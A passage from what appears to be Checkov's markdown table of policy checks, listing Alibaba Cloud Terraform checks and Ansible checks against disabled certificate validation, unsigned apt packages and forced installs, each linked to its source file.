[K8sNodePoolAutoRepair.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/K8sNodePoolAutoRepair.py) | -| 33 | CKV_ALI_32 | resource | alicloud_ecs_launch_template | Ensure launch template data disks are encrypted | Terraform | [LaunchTemplateDisksAreEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LaunchTemplateDisksAreEncrypted.py) | -| 34 | CKV_ALI_33 | resource | alicloud_slb_tls_cipher_policy | Alibaba Cloud Cypher Policy are secure | Terraform | [TLSPoliciesAreSecure.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/TLSPoliciesAreSecure.py) | -| 35 | CKV_ALI_35 | resource | alicloud_db_instance | Ensure RDS instance has log_duration enabled | Terraform | [RDSInstanceLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogsEnabled.py) | -| 36 | CKV_ALI_36 | resource | alicloud_db_instance | Ensure RDS instance has log_disconnections enabled | Terraform | [RDSInstanceLogDisconnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogDisconnections.py) | -| 37 | CKV_ALI_37 | resource | alicloud_db_instance | Ensure RDS instance has log_connections enabled | Terraform | [RDSInstanceLogConnections.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/RDSInstanceLogConnections.py) | -| 38 | CKV_ALI_38 | resource | alicloud_log_audit | Ensure log audit is enabled for RDS | Terraform | [LogAuditRDSEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/LogAuditRDSEnabled.py) | -| 39 | CKV_ALI_41 | resource | alicloud_mongodb_instance | Ensure MongoDB is deployed inside a VPC | Terraform | 
[MongoDBInsideVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py) | -| 40 | CKV_ALI_42 | resource | alicloud_mongodb_instance | Ensure Mongodb instance uses SSL | Terraform | [MongoDBInstanceSSL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBInstanceSSL.py) | -| 41 | CKV_ALI_43 | resource | alicloud_mongodb_instance | Ensure MongoDB instance is not public | Terraform | [MongoDBIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBIsPublic.py) | -| 42 | CKV_ALI_44 | resource | alicloud_mongodb_instance | Ensure MongoDB has Transparent Data Encryption Enabled | Terraform | [MongoDBTransparentDataEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/alicloud/MongoDBTransparentDataEncryptionEnabled.py) | -| 43 | CKV_ANSIBLE_1 | resource | [?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 44 | CKV_ANSIBLE_1 | resource | [?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 45 | CKV_ANSIBLE_1 | resource | [].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 46 | CKV_ANSIBLE_1 | resource | [].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | 
[UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 47 | CKV_ANSIBLE_1 | resource | [].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 48 | CKV_ANSIBLE_1 | resource | [].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 49 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 50 | CKV_ANSIBLE_1 | resource | [].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 51 | CKV_ANSIBLE_1 | resource | [].tasks[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 52 | CKV_ANSIBLE_1 | resource | [].tasks[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 53 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | 
[UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 54 | CKV_ANSIBLE_1 | resource | [].tasks[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 55 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 56 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 57 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 58 | CKV_ANSIBLE_1 | resource | [].tasks[].block[].block[].block[?"uri" != null][] | Ensure that certificate validation isn't disabled with uri | Ansible | [UriValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/UriValidateCerts.py) | -| 59 | CKV_ANSIBLE_2 | resource | [?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 60 | CKV_ANSIBLE_2 | resource | [?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | 
Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 61 | CKV_ANSIBLE_2 | resource | [].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 62 | CKV_ANSIBLE_2 | resource | [].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 63 | CKV_ANSIBLE_2 | resource | [].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 64 | CKV_ANSIBLE_2 | resource | [].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 65 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 66 | CKV_ANSIBLE_2 | resource | [].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 67 | CKV_ANSIBLE_2 | resource | [].tasks[?"ansible.builtin.get_url" != 
null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 68 | CKV_ANSIBLE_2 | resource | [].tasks[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 69 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 70 | CKV_ANSIBLE_2 | resource | [].tasks[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 71 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 72 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 73 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | 
[GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 74 | CKV_ANSIBLE_2 | resource | [].tasks[].block[].block[].block[?"get_url" != null][] | Ensure that certificate validation isn't disabled with get_url | Ansible | [GetUrlValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/GetUrlValidateCerts.py) | -| 75 | CKV_ANSIBLE_3 | resource | [?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 76 | CKV_ANSIBLE_3 | resource | [?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 77 | CKV_ANSIBLE_3 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 78 | CKV_ANSIBLE_3 | resource | [].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 79 | CKV_ANSIBLE_3 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 80 | CKV_ANSIBLE_3 | resource | [].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | 
[YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 81 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 82 | CKV_ANSIBLE_3 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 83 | CKV_ANSIBLE_3 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 84 | CKV_ANSIBLE_3 | resource | [].tasks[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 85 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 86 | CKV_ANSIBLE_3 | resource | [].tasks[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 87 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | 
[YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 88 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 89 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 90 | CKV_ANSIBLE_3 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that certificate validation isn't disabled with yum | Ansible | [YumValidateCerts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumValidateCerts.py) | -| 91 | CKV_ANSIBLE_4 | resource | [?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 92 | CKV_ANSIBLE_4 | resource | [?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 93 | CKV_ANSIBLE_4 | resource | [].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 94 | CKV_ANSIBLE_4 | resource | [].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | 
[YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 95 | CKV_ANSIBLE_4 | resource | [].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 96 | CKV_ANSIBLE_4 | resource | [].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 97 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 98 | CKV_ANSIBLE_4 | resource | [].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 99 | CKV_ANSIBLE_4 | resource | [].tasks[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 100 | CKV_ANSIBLE_4 | resource | [].tasks[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 101 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 
102 | CKV_ANSIBLE_4 | resource | [].tasks[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 103 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 104 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 105 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 106 | CKV_ANSIBLE_4 | resource | [].tasks[].block[].block[].block[?"yum" != null][] | Ensure that SSL validation isn't disabled with yum | Ansible | [YumSslVerify.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/YumSslVerify.py) | -| 107 | CKV_ANSIBLE_5 | resource | [?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 108 | CKV_ANSIBLE_5 | resource | [?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 109 | CKV_ANSIBLE_5 | resource | 
[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 110 | CKV_ANSIBLE_5 | resource | [].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 111 | CKV_ANSIBLE_5 | resource | [].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 112 | CKV_ANSIBLE_5 | resource | [].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 113 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 114 | CKV_ANSIBLE_5 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 115 | CKV_ANSIBLE_5 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | 
[AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 116 | CKV_ANSIBLE_5 | resource | [].tasks[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 117 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 118 | CKV_ANSIBLE_5 | resource | [].tasks[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 119 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 120 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 121 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | 
[AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 122 | CKV_ANSIBLE_5 | resource | [].tasks[].block[].block[].block[?"apt" != null][] | Ensure that packages with untrusted or missing signatures are not used | Ansible | [AptAllowUnauthenticated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptAllowUnauthenticated.py) | -| 123 | CKV_ANSIBLE_6 | resource | [?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 124 | CKV_ANSIBLE_6 | resource | [?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 125 | CKV_ANSIBLE_6 | resource | [].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 126 | CKV_ANSIBLE_6 | resource | [].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 127 | CKV_ANSIBLE_6 | resource | 
[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 128 | CKV_ANSIBLE_6 | resource | [].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 129 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 130 | CKV_ANSIBLE_6 | resource | [].block[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 131 | CKV_ANSIBLE_6 | resource | [].tasks[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 132 | CKV_ANSIBLE_6 | resource | [].tasks[?"apt" != null][] | Ensure that the 
force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 133 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 134 | CKV_ANSIBLE_6 | resource | [].tasks[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 135 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 136 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[?"apt" != null][] | Ensure that the force parameter is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | Ansible | [AptForce.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/ansible/checks/task/builtin/AptForce.py) | -| 137 | CKV_ANSIBLE_6 | resource | [].tasks[].block[].block[].block[?"ansible.builtin.apt" != null][] | Ensure that the force parameter is not 
